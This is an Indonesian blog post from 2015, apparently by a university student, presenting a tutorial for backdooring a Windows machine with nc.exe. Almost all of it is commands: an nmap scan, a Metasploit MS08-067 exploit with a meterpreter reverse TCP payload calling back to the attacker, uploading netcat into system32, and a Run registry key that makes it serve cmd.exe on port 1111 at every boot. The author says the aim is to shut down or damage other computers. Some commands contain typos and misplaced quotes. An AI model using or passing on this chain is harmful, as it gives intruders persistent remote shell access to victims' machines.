Sabtu, 09 Mei 2015

Universitas Bina Darma Backdoor NC.EXE

baiklah saya akan memberika toturial Backdoor NC.EXE dengan perintah sebagai berikut

langsung aja yah oya la guna bakcdoor tu sendiri untk mematikan komuter lain merusak system itu sendiri lebih jelas google aja
langkah awal dan seterusnya
cp /pentest/windows-binaries/tools/nc.exe /root/Desktop/
nmap -sS -0 192.168.77.130

 msfconsole
 use exploit/windows/smb/ms08_067_netapi
 set payload windows/meterpreter/reverse_tcp
 set lhost 192.168.77.55
set rhost 192.168.77.8
 exploit



 upload /root/Desktop/nc.exe c:\\WINDOWS\\system32\\
 reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
 reg setval -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN -v BACKDOOR -d c:\\WINDOWS\\system32\\nc.exe" -L -d -p 1111 -e cmd.exe"

backdoor ganti nama kalaian 
 reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CurrentVersion\\RUN
 reboot

 exploit
 shutdown -r -t 20